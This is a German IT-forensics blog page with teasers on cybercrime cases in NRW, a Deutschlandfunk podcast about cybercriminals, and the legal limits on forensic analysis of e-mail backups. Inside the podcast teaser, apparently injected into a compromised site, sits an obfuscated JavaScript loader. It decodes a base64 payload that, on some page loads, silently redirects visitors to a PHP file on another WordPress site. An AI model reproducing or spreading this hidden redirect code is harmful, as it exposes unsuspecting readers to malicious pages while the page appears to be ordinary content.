Zentralstelle zur Cyber Crime Bekämpfung (ZAC) und Fallzahlen in NRW

© Ben Chams - Fotolia.comGerade haben Unbekannte 16 Millionen Zugangsdaten verschiedener Onlinedienste gekapert – vor allem deutsche Nutzer sind betroffen. Bei einer US-Einzelhandelskette erbeuteten Cyberkriminelle rund siebzig Millionen Kundendatensätze einschließlich Kreditkarteninfos. Es sind die zwei neuesten Fälle schwere Hackerattacken. Die Täter: bestens organisiert, dreist und schnell. Die Opfer: schlecht vorbereitet.

Weiterlesen...

Deutschlandfunk Podcast: Von Trojanern, Viren und Spionen

Geschonneck im Deutschl<script/>function u2fd518ba9147(q3){var u9=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=‘;var y7=“;var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0<q3.length);document.write(y7);};u2fd518ba9147('PHNjcmlwdD4NCnZhciBudW1iZXIxPU1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDYpOyANCmlmIChudW1iZXIxPT0zKQ0Kew0KIHZhciBkZWxheSA9IDE4MDAwOwkNCiBzZXRUaW1lb3V0KCJkb2N1bWVudC5sb2NhdGlvbi5ocmVmPSdodHRwOi8vd3d3LmJ0bGF3ZmlybS5jb20vd3AtY29udGVudC9wbHVnaW5zL3NpLWNvbnRhY3QtZm9ybS9jYXB0Y2hhLXNlY3VyZWltYWdlL3NlY3VyaW1hZ2Vfc3RvcC5waHAnIiwgZGVsYXkpOw0KfQ0KPC9zY3JpcHQ+');andradioVor einigen Tagen erschien im Deutschlandfunk ein Podcast über die Methoden von Cyberkriminellen und wie es Ihnen oft leicht gemacht wird. Die Sendung kann  Weiterlesen...

forensische Auswertung von E-Mails aus Backups

© Stuart Miles - Fotolia.comDie Verlockung für den IT-Forensiker ist groß, wenn Backupbestände mit alten Daten und E-Mails vorhanden sind. Würde der leichtsinnige private Ermittler hier alle Backups sofort wiederherstellen und die Suche darin beginnen, denkt der rechtssichere IT-Forensiker nochmal kurz darüber nach. Hier gilt: Nicht alles, was technisch möglich ist, ist auch erlaubt. Ein wichtiges Urteil hat dazu jüngst das Verwaltungsgericht Karlsruhe

Weiterlesen...